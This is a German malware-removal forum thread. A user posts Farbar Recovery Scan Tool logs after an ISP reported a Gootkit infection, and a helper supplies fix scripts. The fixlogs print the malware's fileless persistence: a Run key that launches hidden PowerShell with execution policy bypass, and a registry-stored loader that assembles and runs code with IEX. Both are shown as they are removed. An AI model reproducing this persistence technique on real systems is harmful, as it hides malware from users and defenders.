FirewallRules: [{7FEA5C8B-41AA-47AA-AB42-EE8B98EEC153}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{EFC05FE9-0631-47C8-8829-F88236543D1D}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{83B73CBC-B790-4630-AB96-4313987A6044}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe => Keine Datei
FirewallRules: [{089F6DD6-FFB4-4EE6-90BC-133177D6DB95}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe => Keine Datei
FirewallRules: [{E78384C4-42D9-447E-AB1C-6BD6707DC1F8}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe => Keine Datei
FirewallRules: [{07FA2E7B-A038-44BB-9C18-177704A48D70}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe => Keine Datei
FirewallRules: [{CE82E4DB-AC72-4603-BBF5-1FECC3641F49}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe => Keine Datei
FirewallRules: [{6481F0B3-4C3F-4335-A528-FE731D96F7AC}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe => Keine Datei
FirewallRules: [{0C53BEA4-423A-4FD4-A758-11806EDE4BC3}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4B6DE64A-FDB2-4816-8BEF-E90AB2088FFF}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9CCB3E66-27F4-4B2D-839F-D41BA8498057}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4B07794B-8FE7-47C2-930F-0986D4C3C844}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{C6170BB2-9C85-45B7-A663-0C7F92A8D7C0}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{535E7441-07E0-4363-A4DE-4CB15D2E4B7B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{A6E67A19-69AC-4849-97BF-ADEA71F81C1E}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\umi.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{C28CB5C2-93DC-4E31-8755-850AE874974F}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\umi.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{4E11A4E0-B35E-499C-820E-3316A698B307}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\PMSRegisterFile.exe () [Datei ist nicht signiert]
FirewallRules: [{DEFB9033-AC35-43D8-9852-53F9CA3FB3DC}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\PMSRegisterFile.exe () [Datei ist nicht signiert]
FirewallRules: [{8C086B40-D8F0-4F42-A5AF-6ED7075EBCE4}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\Studio.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{46FED456-01B9-4FDA-AAA7-30B031C8D13B}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\Studio.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{5D328195-9B4E-43F0-AA72-96613C29D39F}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\RM.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{69E66B2A-B22A-4503-AE6F-07F07BC2245E}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\RM.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{D29AC411-467F-4416-B78A-8569A1C2DFF9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe => Keine Datei
FirewallRules: [{D97DA325-BD62-4F0D-B0D7-6296D6997D38}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe => Keine Datei
FirewallRules: [{6B70FC3E-B345-4FD9-85C3-2A1FC0C17A34}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe => Keine Datei
FirewallRules: [{DFA8AADA-88FC-42CA-9062-995E26FA6EF6}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{BFB25E99-F6C9-4EDC-A91D-C118EE06853F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{138DFF76-5C3D-469A-9D68-FC8479590C3E}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{8DFF8679-2A71-4447-B774-EB60DA9BFE91}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{339D5AAB-06EB-4649-BCE1-808561764131}] => (Allow) C:\Program Files\MAGIX\Video deluxe Plus\2020\Videodeluxe.exe (MAGIX Software GmbH -> MAGIX Software GmbH)

==================== Wiederherstellungspunkte =========================

19-09-2020 19:07:53 Windows Modules Installer
16-10-2020 09:03:00 Windows Modules Installer
24-10-2020 15:16:35 Windows Modules Installer
12-11-2020 19:01:41 
12-11-2020 19:01:57 Windows Update
22-11-2020 18:12:18 Konfiguriert AeroFly Professional Deluxe AddOn 3 (True Scale Add?à*!0
11-12-2020 10:35:05 Windows Modules Installer
31-12-2020 16:19:29 Windows Modules Installer
13-01-2021 22:03:54 Removed Adobe Acrobat Reader DC - Deutsch.

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (01/13/2021 11:58:46 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 11:58:45 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 11:52:29 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 11:52:28 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 10:56:06 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 10:56:04 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 10:10:29 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (01/13/2021 08:42:22 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.


Systemfehler:
=============
Error: (01/14/2021 12:09:51 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "McAfee WebAdvisor" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:07:50 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "InCDsrvR" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:07:50 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "InCDsrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:07:15 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "iPod-Dienst" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (01/14/2021 12:07:15 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "FABS - Helping agent for MAGIX media database" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (01/14/2021 12:07:15 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "NVIDIA Telemetry Container" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (01/14/2021 12:07:15 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "MyEpson Portal Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (01/14/2021 12:07:15 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Dienst "Bonjour"" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.


Windows Defender:
===================================
Date: 2021-01-13 23:59:41.3680000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {D74B78B1-CDE6-44EB-94BF-D6CA034E2A30}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-13 23:53:50.0850000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {8366B6AF-A5E6-4FC3-ACAC-B3C211DEF29D}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-13 23:04:54.0390000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {DFA6E748-E7A7-41F1-B845-126F71135B05}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-14 00:07:55.3290000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-14 00:07:55.3290000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiSpyware
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-14 00:07:55.3290000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-14 00:07:55.3200000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-14 00:07:55.3190000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiSpyware
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

CodeIntegrity:
===================================

Date: 2021-01-13 20:42:22.8280000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.8230000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.7690000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.7530000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3530000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3470000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3400000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3350000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: FUJITSU // American Megatrends Inc. V4.6.5.3 R1.23.0 for D3162-A1x 12/01/2014
Hauptplatine: FUJITSU D3162-A1
Prozessor: Intel(R) Core(TM) i5-3570 CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 33%
Installierter physikalischer RAM: 8107.74 MB
Verfügbarer physikalischer RAM: 5414.34 MB
Summe virtueller Speicher: 12203.74 MB
Verfügbarer virtueller Speicher: 8546.01 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:930.12 GB) (Free:704.85 GB) NTFS
Drive f: (Daten) (Fixed) (Total:634.76 GB) (Free:269.72 GB) NTFS
Drive g: (Volume) (Fixed) (Total:296.75 GB) (Free:167.42 GB) NTFS

\\?\Volume{897fd41d-0000-0000-0000-100000000000}\ () (Fixed) (Total:0.49 GB) (Free:0.45 GB) NTFS
\\?\Volume{897fd41d-0000-0000-0000-d0a6e8000000}\ () (Fixed) (Total:0.91 GB) (Free:0.41 GB) NTFS

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 8D638B93)
Partition 1: (Not Active) - (Size=634.8 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=296.7 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 897FD41D)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=928 MB) - (Type=27)

==================== Ende von Addition.txt =======================
         
Mist war zu schnell - Anweisung noch nicht gesehen und umgesetzt ...

Fixlog:
Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von Peter (14-01-2021 00:28:14) Run:1
Gestartet von C:\Users\Peter\Desktop
Geladene Profile: Peter
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [acbdabdacadcfecb] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('acbdabdacadcfecb', 'User'))" <==== ACHTUNG
Task: {719C960A-5108-4058-AF9F-1A0C8C497CCA} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG
"C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" wurde entsperrt. <==== ACHTUNG
Task: {F1F10BFF-3BC5-45A5-945E-7A0157B66721} - \Scheduled Update for Ask Toolbar -> Keine Datei <==== ACHTUNG
cmd: reg query "HKCU\Environment"
cmd: reg query "HKCU\Software\%username%"
cmd: reg query "HKCU\Software"
cmd: netsh advfirewall reset
EmptyTemp:

*****************

"HKU\S-1-5-21-716491260-3257532223-3478221735-1001\Software\Microsoft\Windows\CurrentVersion\Run\\acbdabdacadcfecb" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{719C960A-5108-4058-AF9F-1A0C8C497CCA}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{719C960A-5108-4058-AF9F-1A0C8C497CCA}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => nicht gefunden
"C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" wurde entsperrt. <==== ACHTUNG" => nicht gefunden
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F1F10BFF-3BC5-45A5-945E-7A0157B66721}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F1F10BFF-3BC5-45A5-945E-7A0157B66721}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Scheduled Update for Ask Toolbar" => nicht gefunden

========= reg query "HKCU\Environment" =========


HKEY_CURRENT_USER\Environment
    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
    TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    TMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    OneDrive    REG_EXPAND_SZ    C:\Users\Peter\OneDrive
    acbdabdacadcfecb    REG_EXPAND_SZ    for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\acbdabdacadcfecb').$i}Catch{}}IEX($abc)


========= Ende von CMD: =========


========= reg query "HKCU\Software\%username%" =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.

========= Ende von CMD: =========


========= reg query "HKCU\Software" =========


HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\Ahead
HKEY_CURRENT_USER\Software\AMD
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\Apple Computer, Inc.
HKEY_CURRENT_USER\Software\Apple Inc.
HKEY_CURRENT_USER\Software\ATI
HKEY_CURRENT_USER\Software\Canon
HKEY_CURRENT_USER\Software\CanonBJ
HKEY_CURRENT_USER\Software\CeWe Color
HKEY_CURRENT_USER\Software\Chromium
HKEY_CURRENT_USER\Software\Clients
HKEY_CURRENT_USER\Software\DivXNetworks
HKEY_CURRENT_USER\Software\EPSON
HKEY_CURRENT_USER\Software\EPSON Software Updater
HKEY_CURRENT_USER\Software\Google
HKEY_CURRENT_USER\Software\Intel
HKEY_CURRENT_USER\Software\IPACS
HKEY_CURRENT_USER\Software\Ligos
HKEY_CURRENT_USER\Software\Local AppWizard-Generated Applications
HKEY_CURRENT_USER\Software\LogMeInInc
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Magix
HKEY_CURRENT_USER\Software\MAGIX AG
HKEY_CURRENT_USER\Software\MAGIX Software GmbH
HKEY_CURRENT_USER\Software\MainConcept (Magix)
HKEY_CURRENT_USER\Software\MediaNavigation
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Mozilla
HKEY_CURRENT_USER\Software\NCH Software
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\NVIDIA Corporation
HKEY_CURRENT_USER\Software\Pinnacle Systems
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\QtProject
HKEY_CURRENT_USER\Software\Raptr
HKEY_CURRENT_USER\Software\RegisteredApplications
HKEY_CURRENT_USER\Software\Seiko Epson Corporation
HKEY_CURRENT_USER\Software\simplitec
HKEY_CURRENT_USER\Software\Sony Creative Software
HKEY_CURRENT_USER\Software\Sophos
HKEY_CURRENT_USER\Software\techPowerUp
HKEY_CURRENT_USER\Software\Thunderbird
HKEY_CURRENT_USER\Software\TreeSize
HKEY_CURRENT_USER\Software\Trolltech
HKEY_CURRENT_USER\Software\Unav
HKEY_CURRENT_USER\Software\VOB
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\WsjXM
HKEY_CURRENT_USER\Software\Xara
HKEY_CURRENT_USER\Software\Yahoo
HKEY_CURRENT_USER\Software\Classes

========= Ende von CMD: =========


========= netsh advfirewall reset =========

OK.


========= Ende von CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 10510336 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 2751283907 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 5472465 B
Edge => 1442842 B
Chrome => 0 B
Firefox => 138583533 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 6656 B
ProgramData => 6656 B
Public => 6656 B
systemprofile => 373687 B
systemprofile32 => 373687 B
LocalService => 882731 B
NetworkService => 940071 B
defaultuser0 => 947239 B
Peter => 63937654 B

RecycleBin => 4511975 B
EmptyTemp: => 2.8 GB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 00:30:03 ====
         

Alt 14.01.2021, 00:36   #8
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Noch ein Fix bitte:

Scripting/Repair mit FRST64
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    DeleteValue: HKEY_CURRENT_USER\Environment|acbdabdacadcfecb
    cmd: reg query "HKCU\Environment"
    cmd: reg query "HKCU\Software\%username%"
    cmd: reg query "HKCU\Software"
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Alt 14.01.2021, 00:42   #9
Andy4Peter
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von Peter (14-01-2021 00:40:21) Run:2
Gestartet von C:\Users\Peter\Desktop
Geladene Profile: Peter
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
DeleteValue: HKEY_CURRENT_USER\Environment|acbdabdacadcfecb
cmd: reg query "HKCU\Environment"
cmd: reg query "HKCU\Software\%username%"
cmd: reg query "HKCU\Software"

*****************

"HKEY_CURRENT_USER\Environment\\acbdabdacadcfecb" => erfolgreich entfernt

========= reg query "HKCU\Environment" =========


HKEY_CURRENT_USER\Environment
    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
    TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    TMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    OneDrive    REG_EXPAND_SZ    C:\Users\Peter\OneDrive


========= Ende von CMD: =========


========= reg query "HKCU\Software\%username%" =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.

========= Ende von CMD: =========


========= reg query "HKCU\Software" =========


HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\Ahead
HKEY_CURRENT_USER\Software\AMD
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\Apple Computer, Inc.
HKEY_CURRENT_USER\Software\Apple Inc.
HKEY_CURRENT_USER\Software\ATI
HKEY_CURRENT_USER\Software\Canon
HKEY_CURRENT_USER\Software\CanonBJ
HKEY_CURRENT_USER\Software\CeWe Color
HKEY_CURRENT_USER\Software\Chromium
HKEY_CURRENT_USER\Software\Clients
HKEY_CURRENT_USER\Software\DivXNetworks
HKEY_CURRENT_USER\Software\EPSON
HKEY_CURRENT_USER\Software\EPSON Software Updater
HKEY_CURRENT_USER\Software\Google
HKEY_CURRENT_USER\Software\Intel
HKEY_CURRENT_USER\Software\IPACS
HKEY_CURRENT_USER\Software\Ligos
HKEY_CURRENT_USER\Software\Local AppWizard-Generated Applications
HKEY_CURRENT_USER\Software\LogMeInInc
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Magix
HKEY_CURRENT_USER\Software\MAGIX AG
HKEY_CURRENT_USER\Software\MAGIX Software GmbH
HKEY_CURRENT_USER\Software\MainConcept (Magix)
HKEY_CURRENT_USER\Software\MediaNavigation
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Mozilla
HKEY_CURRENT_USER\Software\NCH Software
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\NVIDIA Corporation
HKEY_CURRENT_USER\Software\Pinnacle Systems
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\QtProject
HKEY_CURRENT_USER\Software\Raptr
HKEY_CURRENT_USER\Software\RegisteredApplications
HKEY_CURRENT_USER\Software\Seiko Epson Corporation
HKEY_CURRENT_USER\Software\simplitec
HKEY_CURRENT_USER\Software\Sony Creative Software
HKEY_CURRENT_USER\Software\Sophos
HKEY_CURRENT_USER\Software\techPowerUp
HKEY_CURRENT_USER\Software\Thunderbird
HKEY_CURRENT_USER\Software\TreeSize
HKEY_CURRENT_USER\Software\Trolltech
HKEY_CURRENT_USER\Software\Unav
HKEY_CURRENT_USER\Software\VOB
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\WsjXM
HKEY_CURRENT_USER\Software\Xara
HKEY_CURRENT_USER\Software\Yahoo
HKEY_CURRENT_USER\Software\Classes

========= Ende von CMD: =========


==== Ende von Fixlog 00:40:21 ====
         

Alt 14.01.2021, 01:10   #10
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
